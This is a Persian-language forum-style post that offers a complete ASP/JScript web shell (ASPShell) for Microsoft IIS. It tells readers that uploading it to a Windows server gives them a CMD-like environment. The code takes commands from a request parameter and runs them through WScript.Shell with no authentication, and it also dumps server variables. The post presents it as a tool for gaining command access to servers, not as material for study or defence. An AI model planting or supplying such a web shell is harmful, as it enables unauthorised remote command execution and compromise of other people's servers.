یک شلر باحال واسه بچه های باحال با آپلود این شل روی سرور ویندوز میتونید به محیطی همانند CMD برای اجرای دستورات دسترسی داشته باشید .
کد:
<%@ Language = "JScript" %> <% /* ASPShell - web based shell for Microsoft IIS Copyright (C) 2007 Kurt Hanner This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA http://aspshell.sourceforge.net */ var version = "0.2 (beta) [2007-09-29]"; var homepagelink = "http://aspshell.sourceforge.net"; var q = Request("q")(); var cd = Request("cd")(); if (q) { var command = ""; var output = ""; if (q.length == 0) { q = ":"; } command = "" + q; if (command == "?") { output = " ? this help page\n" + " :sv all server variables\n" + " <shell command> execute any shell command\n"; } else if (command.toLowerCase() == ":sv") { var sv = ""; var svvalue = ""; var esv = new Enumerator(Request.ServerVariables); for (; !esv.atEnd(); esv.moveNext()) { sv = esv.item(); output += sv; output += ": "; svvalue = "" + Request.ServerVariables(sv); if (svvalue.indexOf("\n") >= 0) { output += "\n"; var svitems = svvalue.split("\n"); for (var i=0; i<svitems.length; i++) { if (svitems[i].length > 0) { output += " "; output += svitems[i]; output += "\n"; } } } else { output += svvalue; output += "\n"; } } } else if (command.toLowerCase() == ":cd") { var fso = new ActiveXObject("Scripting.FileSystemObject"); output = fso.GetAbsolutePathName("."); } else if (/^:checkdir\s(.*)?$/i.test(command)) { var newdirabs = ""; var newdir = RegExp.$1; var fso = new ActiveXObject("Scripting.FileSystemObject"); var cdnorm = fso.GetFolder(cd).Path; if (/^\\/i.test(newdir)) { newdirabs = fso.GetFolder(cd).Drive + newdir; } else if (/^\w:/i.test(newdir)) { newdirabs = fso.GetAbsolutePathName(newdir); } else { newdirabs = fso.GetAbsolutePathName(fso.GetFolder(cd).Path + "\\" + newdir); } output = fso.FolderExists(newdirabs) ? newdirabs : "fail"; } else { var changedir = ""; var currdrive = ""; var currpath = ""; var colonpos = cd.indexOf(":"); if (colonpos >= 0) { currdrive = cd.substr(0, colonpos+1); currpath = cd.substr(colonpos+1); changedir = currdrive + " && cd \"" + currpath + "\" && "; } var shell = new ActiveXObject("WScript.Shell"); var pipe = shell.Exec("%comspec% /c \"" + changedir + command + "\""); output = pipe.StdOut.ReadAll() + pipe.StdErr.ReadAll(); } Response.Write(output); } else { var fso = new ActiveXObject("Scripting.FileSystemObject"); var currentpath = fso.GetAbsolutePathName("."); var currentdrive = fso.GetDrive(fso.GetDriveName(currentpath)); var drivepath = currentdrive.Path; %> <html> <head> <meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <style><!-- body { background: #000000; color: #CCCCCC; font-family: courier new; font-size: 10pt } input { background: #000000; color: #CCCCCC; border: none; font-family: courier new; font-size: 10pt; } --></style> <script language="JavaScript"><!-- var history = new Array(); var historypos = 0; var currentdirectory = ""; var checkdirectory = ""; function ajax(url, vars, callbackFunction) { var request = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0"); request.open("POST", url, true); request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); request.onreadystatechange = function() { if (request.readyState == 4 && request.status == 200) { if (request.responseText) { callbackFunction(request.responseText); } } } request.send(vars); } function FormatOutput(txt) { return txt.replace(/</g, "<").replace(/>/g, ">").replace(/\x20/g, " ").replace(/\t/g, " ").replace(/\n/g, "<br/>"); } function KeyDownEventHandler(ev) { document.all("q").focus(); if (!ev) { ev = window.event; } if (ev.which) { keycode = ev.which; } else if (ev.keyCode) { keycode = ev.keyCode; } if (keycode == 13) { var cmd = document.all("q").value; outputAvailable("[" + currentdirectory + "] " + cmd); if (/cd\s+(\"?)(.*)?\1\s*$/i.test(cmd)) { checkdirectory = RegExp.$2; ajax(document.URL, "q=" + encodeURIComponent(":checkdir " + RegExp.$2) + "&cd=" + encodeURIComponent(currentdirectory), checkdirAvailable); history[history.length] = cmd; historypos = history.length; } else if (cmd.length > 0) { ajax(document.URL, "q=" + encodeURIComponent(cmd) + "&cd=" + encodeURIComponent(currentdirectory), outputAvailable); history[history.length] = cmd; historypos = history.length; } } else if (keycode == 38 && historypos > 0) { historypos--; document.all("q").value = history[historypos]; } else if (keycode == 40 && historypos < history.length) { historypos++; if (historypos == history.length) { document.all("q").value = ""; } else { document.all("q").value = history[historypos]; } } } function outputAvailable(output) { var newelem = document.createElement("DIV"); newelem.innerHTML = FormatOutput(output); document.all("output").appendChild(newelem); var oldYPos = 0, newYPos = 0; var scroll = true; do { if (document.all) { oldYPos = document.body.scrollTop; } else { oldYPos = window.pageYOffset; } window.scrollBy(0, 100); if (document.all) { newYPos = document.body.scrollTop; } else { newYPos = window.pageYOffset; } } while (oldYPos < newYPos); document.all("q").value = ""; } function checkdirAvailable(output) { if (output.toLowerCase() == "fail") { outputAvailable("The system cannot find the path specified."); } else { SetCurrentDirectory(output); } } function SetCurrentDirectory(output) { currentdirectory = output; document.all("prompt").innerHTML = "[" + output + "]"; } function GetCurrentDirectory() { ajax(document.URL, "q=" + encodeURIComponent(":cd"), SetCurrentDirectory); } function InitPage() { document.all("q").focus(); document.onkeydown = KeyDownEventHandler; GetCurrentDirectory(); } //--></script> <title id=titletext>Web Shell</title> </head> <body onload="InitPage()"> <div id="output"> <div id="greeting"> ASPShell - Web-based Shell Environment Version <%=version%><br/> Copyright (c) 2007 Kurt Hanner, <a href="<%=homepagelink%>"><%=homepagelink%></a><br/><br/> </div> </div> <label id="prompt">[undefined]</label> <input type="text" name="q" maxlength=1024 size=72> </body> </html> <% } %>